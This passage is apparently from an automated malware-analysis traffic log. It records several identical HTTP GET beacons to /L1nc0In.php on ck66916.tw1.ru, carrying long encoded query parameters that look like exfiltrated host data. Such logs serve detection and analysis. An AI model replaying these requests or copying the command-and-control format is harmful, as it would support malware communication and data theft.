CLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: /Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUb